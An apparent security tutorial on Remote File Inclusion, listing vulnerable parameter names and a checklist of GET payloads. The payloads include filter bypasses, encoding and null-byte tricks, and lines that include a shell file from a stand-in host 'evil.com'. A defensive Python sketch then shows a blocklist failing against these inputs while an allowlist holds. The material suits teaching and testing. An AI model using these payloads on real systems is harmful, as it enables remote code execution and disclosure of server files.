Remote File Inclusion or Disclosure (RFI/RFD)
Remote File Inclusion (RFI) enables attackers to load remote files and have them executed on a server.
Any GET endpoint that retrieves a file is a candidate for this vulnerability. Some vulnerable requests might be in an API response and not be directly reflected in the URL of the website. Any parameter can potentially be vulnerable to remote file inclusion, but it's worth paying particular attention to the following parameters: cat, dir, action, filename, board, date, detail, file, download, path, folder, prefix, include, page, inc, locate, show, doc, site, type, view, content, document, layout, mod, conf, directory. These are most of the steps I usually follow:
  1. Test for a domain: GET ?filename=https://www.google.com
  2. Check if http is filtered out with a case-sensitive regexp: GET ?filename=hTtps://www.google.com
  3. Check if http is filtered out with a case-insensitive regexp: GET ?filename=hthttptps://www.google.com
  4. Check for filter bypass: GET ?filename=https://www.google.com?page=http://evil.com/shell.txt
  5. Check for null byte: GET ?filename=https://www.google.com?page=http://evil.com/shell.txt%00
  6. Check for encoding: GET ?filename=https:%2f%2fwww.google.com
  7. Check for double encoding: GET ?filename=https:%252f%252fwww.google.com
  8. Search for filters (example for PHP files only):
    http://example.com/index.php?page=php://filter/convert.iconv.utf-8.utf-16/resource=index.php
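
Seen from the defending side, the checklist above shows why stripping "http" is not a fix. The following Python sketch is an added example, not code from the original page: it runs the checklist's own parameter values through a weak blocklist filter and through an allowlist-based resolver. ALLOWED_PAGES and all function names are assumptions made for illustration.

```python
import re
from urllib.parse import unquote

ALLOWED_PAGES = {"home": "pages/home.php", "about": "pages/about.php"}  # hypothetical
SCHEME = re.compile(r"[a-z][a-z0-9+.\-]*:", re.IGNORECASE)  # http:, hTtps:, php:, ...

def naive_filter(value):
    """Weak blocklist: a single case-sensitive pass that deletes 'http'."""
    return value.replace("http", "")

def still_remote(value):
    """True if the naive filter's output is still an http(s) URL."""
    return naive_filter(value).lower().startswith(("http://", "https://"))

def normalize(value, max_rounds=3):
    """Percent-decode repeatedly so double encoding cannot hide a scheme."""
    for _ in range(max_rounds):
        value = unquote(value)
    return value

def findings(value):
    """Reasons to reject (and log) a file parameter value."""
    plain, reasons = normalize(value), []
    if plain != value:
        reasons.append("percent-encoded")
    if "\x00" in plain:
        reasons.append("null-byte")
    if SCHEME.match(plain):
        reasons.append("scheme-or-wrapper")
    return reasons

def resolve_page(value):
    """Allowlist lookup: known names map to a file, everything else to None."""
    return None if findings(value) else ALLOWED_PAGES.get(value)

# The parameter values from the checklist above.
SAMPLES = [
    "https://www.google.com", "hTtps://www.google.com",
    "hthttptps://www.google.com",
    "https://www.google.com?page=http://evil.com/shell.txt",
    "https://www.google.com?page=http://evil.com/shell.txt%00",
    "https:%2f%2fwww.google.com", "https:%252f%252fwww.google.com",
    "php://filter/convert.iconv.utf-8.utf-16/resource=index.php",
]

if __name__ == "__main__":
    for s in SAMPLES:
        print(still_remote(s), findings(s), resolve_page(s), s)
```

The blocklist stops only the plain lowercase value, while the allowlist resolver returns None for every sample because the parameter is treated as a page name rather than a path or URL.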